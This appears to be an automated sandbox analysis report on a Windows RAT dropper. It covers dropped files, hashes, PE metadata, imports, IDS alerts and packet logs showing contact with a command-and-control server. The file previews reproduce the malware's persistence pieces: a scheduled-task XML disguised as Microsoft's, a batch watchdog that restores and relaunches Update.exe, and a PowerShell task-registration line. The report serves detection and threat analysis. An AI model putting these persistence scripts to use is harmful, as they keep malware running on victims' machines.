                                                                                          Preview:@...e...........................................................P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.ConfigurationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.4.................%...K... ...........System.Xml..<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins
                                                                                          Process:C:\Users\Public\Bilite\Axialis\Update.exe
                                                                                          File Type:XML 1.0 document, ASCII text
                                                                                          Category:dropped
                                                                                          Size (bytes):1893
                                                                                          Entropy (8bit):5.212287775015203
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:c55XzDl4Q2ZbXL6Q0QFdOFQOzN33O4OiDdKrKsTLXbGMv:O5XzDl4Q2ZbGQhFdOFQOzBdKrKsTLXbV
                                                                                          MD5:E3FB2ECD2AD10C30913339D97E0E9042
                                                                                          SHA1:A004CE2B3D398312B80E2955E76BDA69EF9B7203
                                                                                          SHA-256:1BD6DB55FFF870C9DF7A0AAC11B895B50F57774F20A5744E63BBC3BD40D11F28
                                                                                          SHA-512:9D6F0C1E344F1DC5A0EF4CAAD86281F92A6C108E1085BACD8D6143F9C742198C2F759CA5BDFFAD4D9E40203E6B0460E84896D1C6B8B1759350452E1DE809B716
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2006-11-10T14:29:55.5851926</Date>. <Author>Microsoft Corporation</Author>. <Description>????? AD RMS ?????????????????? Web ?????????,???????????</Description>. <URI>\AS AMD updata</URI>. <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>. </RegistrationInfo>. <Triggers>. <LogonTrigger id="06b3f632-87ad-4ac0-9737-48ea5ddbaf11">. <Enabled>true</Enabled>. <Delay>PT30S</Delay>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="AllUsers">. <GroupId>S-1-1-0</GroupId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerm
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Users\Public\Bilite\Axialis\Update.exe
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):340760
                                                                                          Entropy (8bit):6.543041508104496
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:H66LUtNhlhaEDW8zn0iuAhzRgd5KrS8a1GJAlExz30/hUaCcM:H66LUtNrIAzCKzRgDKrSeGUalM
                                                                                          MD5:AC123A633FFD650E1C52DDEA5877D613
                                                                                          SHA1:D42AE3682768449EFFBAB0A2A80E074B31AC31EE
                                                                                          SHA-256:9FD0498B154F81BB9D25AF45CD6B73D01AE2570ADE3E273BCEFCC54FED4D4ECC
                                                                                          SHA-512:190BD111586DE3D276500116EF021CD19DBC1BC64124183041D258833D61329770E2FDFB83EF923FF28BE6C62A95A7A5B28A0B33564588DDED0D77B09F1BAB4E
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 48%
                                                                                          Process:C:\Users\Public\Bilite\Axialis\Update.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):395368
                                                                                          Entropy (8bit):5.090673225697451
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:I0acLF3rgypB1Grf/TRfiJ7BePaEvLJggZy:Y/TRfi3ePtJRg
                                                                                          MD5:FB325C945A08D06FE91681179BDCCC66
                                                                                          SHA1:F5D91B7D75D34E156066AB4099E0FD0DF9227B32
                                                                                          SHA-256:0C2CC4513EC9101A28A7988C72A46175EFD82F387BB3BCFB2612E808804282B5
                                                                                          SHA-512:2BB588EBE2FA35D03652AEC4E5D51DABD3A24E996336A4D5EC9C762D6084862D5CD5F530F1DA0B98D2887BA88F4E077697D128071FF497D2967F9F42ADC2F533
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Users\Public\Bilite\Axialis\Update.exe
                                                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):769
                                                                                          Entropy (8bit):5.113976261619789
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:NFW/WAW/WAWE3fzWcWrfZKx31SIYaYZLZ6y:NFVAVAjvz6ZKx31SIYN/6y
                                                                                          MD5:F7F23953F7C236A0F12AE4848F174480
                                                                                          SHA1:E222C191BE437B39FB294EDD1FCCAF961B1F7265
                                                                                          SHA-256:0CD1B31F9AA2F089BD33331B172CD4813167BD59F889EFDC7EB2ADAA71F3D9CC
                                                                                          SHA-512:2790AFD071756E25FF408426E0D40879603EBCBC23C1D98AD891017237A2930F27CC19F28C38C5BAB5221E828B0B08727EDCEC1D2AA528FCCED0B7EE576836B8
                                                                                          Malicious:false
                                                                                          Preview:@echo off..:CheckProcess..set "ProcessName=Update.exe"..set "ProcessPath=C:\Users\Public\Bilite\Axialis\Update.exe"..set "BackupProcessPath=C:\Users\user\AppData\Local\Temp\\backup.exe"..set "DLLPath=C:\Users\Public\Bilite\Axialis\Update.dll"..set "BackupDLLPath=C:\Users\user\AppData\Local\Temp\\backup.dll"..if not exist "%ProcessPath%" (.. echo Process file not found, restoring from backup..... copy /Y "%BackupProcessPath%" "%ProcessPath%"..)..if not exist "%DLLPath%" (.. echo DLL file not found, restoring from backup..... copy /Y "%BackupDLLPath%" "%DLLPath%"..)..tasklist /FI "IMAGENAME eq %ProcessName%" | findstr /I "%ProcessName%" >nul..if %ERRORLEVEL% neq 0 (.. start "" "%ProcessPath%"..)..timeout /t 30 /nobreak >nul..goto CheckProcess..
                                                                                          Process:C:\Users\Public\Bilite\Axialis\Update.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):4
                                                                                          Entropy (8bit):2.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:T:T
                                                                                          MD5:501627AA14E37BD1D4143159E0E9620F
                                                                                          SHA1:654F1EBEF4FDF2565E95150A45ABBE6CCB1B00EA
                                                                                          SHA-256:5EDD6B7BA99BE850AB24EF3ACBB3B0DE8F0DCB9A04E70B819B87AB641C88FAEE
                                                                                          SHA-512:F95D7562A6AA9E005B518671FA1A51D9589E416DEBC90905FB85588299963A79A61D3A2689946B1DE6C1088D176B6B20161C0E3AB86C78B5C8CFA8B5A1F26005
                                                                                          Malicious:false
                                                                                          Preview:4592
                                                                                          Process:C:\Users\Public\Bilite\Axialis\Update.exe
                                                                                          File Type:ASCII text
                                                                                          Category:dropped
                                                                                          Size (bytes):151
                                                                                          Entropy (8bit):4.741657013789009
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:41Ai+PBoAwnLFsI2FIERMJyjqLWAfXIhS/ytIEFMEQVGdAn:4yi+5dwnLFsI2F5KJy0fXnMFFQhn
                                                                                          MD5:AA0E1012D3B7C24FAD1BE4806756C2CF
                                                                                          SHA1:FE0D130AF9105D9044FF3D657D1ABEAF0B750516
                                                                                          SHA-256:FC47E1FA89397C3139D9047DC667531A9153A339F8E29AC713E518D51A995897
                                                                                          SHA-512:15FAE192951747A0C71059F608700F88548F3E60BB5C708B206BF793A7E3D059A278F2058D4AC86B86781B202037401A29602EE4D6C0CBAAFF532CEF311975F4
                                                                                          Malicious:true
                                                                                          Preview:$xmlPath = "XML??".$taskName = "????".$xmlContent = Get-Content -Path $xmlPath | Out-String.Register-ScheduledTask -Xml $xmlContent -TaskName $taskName
                                                                                          Process:C:\Users\Public\Bilite\Axialis\Update.exe
                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Jan 6 15:47:40 2025, mtime=Mon Jan 6 15:47:40 2025, atime=Tue Dec 24 07:21:34 2024, length=4118496, window=hide
                                                                                          Category:dropped
                                                                                          Size (bytes):1076
                                                                                          Entropy (8bit):4.678579704227469
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:85VE660UlGIICICHqXOcsw+XtACmqsIsPxgmhXaAjAsboWKD5GNXFav+RwP44t2W:85VEXG/+c9D7lAsC1v+RwIqyFm
                                                                                          MD5:3953F2E3270292CD2042E654ED784172
                                                                                          SHA1:797D4C1984313F0DB7D5E94EEB816654ED432B64
                                                                                          SHA-256:B04168D0CC70DF41BD2B20F7D0468E8ACE32FCEA5755B2B6B05204117C65A24A
                                                                                          SHA-512:610A21B541CE762E02E0416D71E8380087EAA2C65352FCCF608FE7910FA9B9E3B7A838D745880FA3427F1276CFFF23623662F4A5BFBF980DFD4854D2DF947F79
                                                                                          Malicious:false
Process: C:\Windows\SysWOW64\timeout.exe
File Type: ASCII text, with CRLF line terminators, with overstriking
Category: dropped
Size (bytes): 106
Entropy (8bit): 4.319534830924389
Encrypted: false
SSDEEP: 3:hYFRZARcWmFsFJQZ/ctXvY/4to/9uF8cttEfYT:hYFRamFSQZ0lv5y/9JctE+
MD5: 9D67FFD7743BE064B5D738D05280A1CE
SHA1: FF474A3BE27BF8FDB2A3A3F8900CE9CDC5059D6F
SHA-256: 7A1612FA36FBE289B28A63A001157740C5CB50981AD9A99775BC15AEAE7AC8CA
SHA-512: 3E5FE0510E91F93CA10868F82BDB96DAFA562B123FD0719EC9163A037BA44FCFBAFC35EF123F0BC041377CF0FFCB1859A32BA3E42F8058DE9AD68851E6122823
Malicious: false
Preview: ..Waiting for 30 seconds, press CTRL+C to quit .....29..28..27..26..25..24..23..22..21..20..19..18..17..16
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.999887658095491
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: ErbgterT2R.exe
File size: 73'541'183 bytes
MD5: 14dfec5b51c4d87eacab495ad216eb7c
SHA1: fab7846b458694aecabf6770673615ae90493b5e
SHA256: b86af545e9a2f86c05538eb7fcb85cf63085a0730925a9587253d46590a4e4e9
SHA512: fa3d6adb59d1933ccb970cc291ba1bd92b1b796e04ffc00bfdc598f25838338d63fd337040712d313dc23a8adc5ea49a2b557696645793d00aa7f386fde78b1c
SSDEEP: 1572864:nOSB3fJ9u57WcWNY8F378ntkdQaihnfyO5uBNLauCvMS4r:nOm4sxwmqlD5uvPeMB
TLSH: 42F733573B493EAEE786F8B018760F8B1862C0952D1ACC22E1D415125DEBD1B0FA77E7
Icon Hash: 01e0f2ccd4d4c400
Entrypoint: 0x411def
Entrypoint Section: .text
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:
Time Stamp: 0x4C26F87E [Sun Jun 27 07:06:38 2010 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: b5a014d7eeb4c2042897567e1288a095
Signature Valid: false
Signature Issuer: CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
Signature Validation Error: The digital signature of the object did not verify
Error Number: -2146869232
Not Before, Not After:
• 18/07/2022 01:00:00, 18/07/2024 00:59:59
Subject Chain:
• CN=Incredibuild Software Ltd., O=Incredibuild Software Ltd., S=Tel Aviv, C=IL
Version: 3
Thumbprint MD5: 8164525B12F9B6829CCD5054865F2D41
Thumbprint SHA-1: 583F01EE72450A9945FB1CFA539BAAB983D3F1D9
Thumbprint SHA-256: 2EBD549CFBD28201F8773F370E920A21BB010F577BA74B4726332D2CE7836F69
Serial: 7098774ED29B0565AB114EF2F2871CF7
Instruction
push ebp
mov ebp, esp
push FFFFFFFFh
push 00414C50h
push 00411F80h
mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 68h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
xor ebx, ebx
mov dword ptr [ebp-04h], ebx
push 00000002h
call dword ptr [00413184h]
pop ecx
or dword ptr [00419924h], FFFFFFFFh
or dword ptr [00419928h], FFFFFFFFh
call dword ptr [00413188h]
mov ecx, dword ptr [0041791Ch]
mov dword ptr [eax], ecx
call dword ptr [0041318Ch]
mov ecx, dword ptr [00417918h]
mov dword ptr [eax], ecx
mov eax, dword ptr [00413190h]
mov eax, dword ptr [eax]
mov dword ptr [00419920h], eax
call 00007FBF854298E2h
cmp dword ptr [00417710h], ebx
jne 00007FBF854297CEh
push 00411F78h
call dword ptr [00413194h]
pop ecx
call 00007FBF854298B4h
push 00417048h
push 00417044h
call 00007FBF8542989Fh
mov eax, dword ptr [00417914h]
mov dword ptr [ebp-6Ch], eax
lea eax, dword ptr [ebp-6Ch]
push eax
push dword ptr [00417910h]
lea eax, dword ptr [ebp-64h]
push eax
lea eax, dword ptr [ebp-70h]
push eax
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [0041319Ch]
push 00417040h
push 00417000h
call 00007FBF8542986Ch
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x150dc | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1a000 | 0x190d7 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x461fd27 | 0x2918 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x13000 | 0x310 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x11317 | 0x11400 | 797279c5ab1a163aed1f2a528f9fe3ce | False | 0.6174988677536232 | data | 6.576987441854239 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x13000 | 0x30ea | 0x3200 | 1359639b02bcb8f0a8743e6ead1c0030 | False | 0.43828125 | data | 5.549434098115495 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x17000 | 0x292c | 0x800 | 9415c9c8dea3245d6d73c23393e27d8e | False | 0.431640625 | data | 3.6583182363171756 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x1a000 | 0x190d7 | 0x19200 | aedf42f084dabb70902985d8cb8d4f42 | False | 0.14223802860696516 | data | 4.481844282645869 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x1a208 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | Russian | Russia | 0.42819148936170215
RT_ICON | 0x1a670 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Russian | Russia | 0.2767354596622889
RT_ICON | 0x1b718 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | Russian | Russia | 0.2513485477178423
RT_ICON | 0x1dcc0 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | Russian | Russia | 0.17170524326877656
RT_ICON | 0x21ee8 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | Russian | Russia | 0.09922512717378446
RT_GROUP_ICON | 0x32710 | 0x4c | data | Russian | Russia | 0.7763157894736842
RT_VERSION | 0x3275c | 0x350 | data | English | United States | 0.47523584905660377
RT_VERSION | 0x32aac | 0x3b0 | data | Chinese | China | 0.4523305084745763
RT_MANIFEST | 0x32e5c | 0x27b | ASCII text, with very long lines (635), with no line terminators | English | United States | 0.5118110236220472
DLL | Import
COMCTL32.dll |
KERNEL32.dll | GetFileAttributesW, CreateDirectoryW, WriteFile, GetStdHandle, VirtualFree, GetModuleHandleW, GetProcAddress, LoadLibraryA, LockResource, LoadResource, SizeofResource, FindResourceExA, MulDiv, GlobalFree, GlobalAlloc, lstrcmpiA, GetSystemDefaultLCID, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, MultiByteToWideChar, GetLocaleInfoW, lstrlenA, lstrcmpiW, GetEnvironmentVariableW, lstrcmpW, GlobalMemoryStatusEx, VirtualAlloc, WideCharToMultiByte, ExpandEnvironmentStringsW, RemoveDirectoryW, FindClose, FindNextFileW, DeleteFileW, FindFirstFileW, SetThreadLocale, GetLocalTime, GetSystemTimeAsFileTime, lstrlenW, GetTempPathW, SetEnvironmentVariableW, CloseHandle, CreateFileW, GetDriveTypeW, SetCurrentDirectoryW, GetModuleFileNameW, GetCommandLineW, GetVersionExW, CreateEventW, SetEvent, ResetEvent, InitializeCriticalSection, TerminateThread, ResumeThread, SuspendThread, IsBadReadPtr, LocalFree, lstrcpyW, FormatMessageW, GetSystemDirectoryW, DeleteCriticalSection, GetFileSize, SetFilePointer, ReadFile, SetFileTime, SetEndOfFile, EnterCriticalSection, LeaveCriticalSection, WaitForMultipleObjects, GetModuleHandleA, SystemTimeToFileTime, GetLastError, CreateThread, WaitForSingleObject, GetExitCodeThread, Sleep, SetLastError, SetFileAttributesW, GetDiskFreeSpaceExW, lstrcatW, ExitProcess, CompareFileTime, GetStartupInfoA
USER32.dll | CharUpperW, EndDialog, DestroyWindow, KillTimer, ReleaseDC, DispatchMessageW, GetMessageW, SetTimer, CreateWindowExW, ScreenToClient, GetWindowRect, wsprintfW, GetParent, GetSystemMenu, EnableMenuItem, EnableWindow, MessageBeep, LoadIconW, LoadImageW, wvsprintfW, IsWindow, DefWindowProcW, CallWindowProcW, DrawIconEx, DialogBoxIndirectParamW, GetWindow, ClientToScreen, GetDC, DrawTextW, ShowWindow, SystemParametersInfoW, SetFocus, SetWindowLongW, GetSystemMetrics, GetClientRect, GetDlgItem, GetKeyState, MessageBoxA, wsprintfA, SetWindowTextW, GetSysColor, GetWindowTextLengthW, GetWindowTextW, GetClassNameA, GetWindowLongW, GetMenu, SetWindowPos, CopyImage, SendMessageW, GetWindowDC
GDI32.dll | GetCurrentObject, StretchBlt, SetStretchBltMode, CreateCompatibleBitmap, SelectObject, CreateCompatibleDC, GetObjectW, GetDeviceCaps, DeleteObject, CreateFontIndirectW, DeleteDC
SHELL32.dll | SHGetFileInfoW, SHBrowseForFolderW, SHGetPathFromIDListW, SHGetMalloc, ShellExecuteExW, SHGetSpecialFolderPathW, ShellExecuteW
ole32.dll | CoInitialize, CreateStreamOnHGlobal, CoCreateInstance
OLEAUT32.dll | VariantClear, OleLoadPicture, SysAllocString
MSVCRT.dll | __set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, ??1type_info@@UAE@XZ, _onexit, __dllonexit, _CxxThrowException, _beginthreadex, _EH_prolog, memset, _wcsnicmp, strncmp, malloc, memmove, _wtol, memcpy, free, memcmp, _purecall, ??2@YAPAXI@Z, ??3@YAXPAX@Z, _except_handler3, _controlfp
Language of compilation system | Country where language is spoken | Map
Russian | Russia |
English | United States |
Chinese | China |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-06T17:48:56.323252+0100 | 2052875 | ET MALWARE Anonymous RAT CnC Checkin | 1 | 192.168.2.4 | 49922 | 134.122.155.39 | 15091 | TCP
2025-01-06T17:50:05.766655+0100 | 2052875 | ET MALWARE Anonymous RAT CnC Checkin | 1 | 192.168.2.4 | 49940 | 134.122.155.39 | 15091 | TCP
                                                                                          Jan 6, 2025 17:48:53.930310011 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.930320978 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.930330992 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.930341005 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.930358887 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.930365086 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:53.930433035 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:53.930753946 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.930766106 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.930777073 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.930787086 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.930797100 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.930809021 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.930809975 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:53.930820942 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.930833101 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:53.930851936 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:53.931504965 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.931515932 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.931530952 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.931540966 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.931552887 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.931562901 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.931566000 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:53.931575060 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.931601048 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:53.931632996 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:53.932174921 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.932184935 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.932197094 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.932223082 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:53.932245970 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.932256937 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.932269096 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.932286024 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.932297945 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.932317972 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:53.932317972 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:53.932334900 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:53.933094025 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.933118105 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.933129072 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.933139086 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.933149099 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.933191061 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.933191061 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:53.933191061 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:53.933202982 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.933216095 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.933243990 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:53.933260918 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:53.934083939 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.934094906 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.934104919 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.934114933 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.934125900 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.934135914 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.934148073 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:53.934148073 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:53.934185028 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:54.140855074 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:54.140867949 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:54.140887022 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:54.140897989 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:54.140916109 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:54.140928030 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:54.140928030 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:54.140959024 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:54.140964985 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:54.140969038 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:54.140980959 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:54.141022921 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:54.141221046 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:54.141238928 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:54.141247988 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:54.141292095 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:54.141489029 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:54.141499996 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:54.141510963 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:54.141520977 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:54.141530037 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:54.141532898 CET1885249900134.122.155.39192.168.2.4
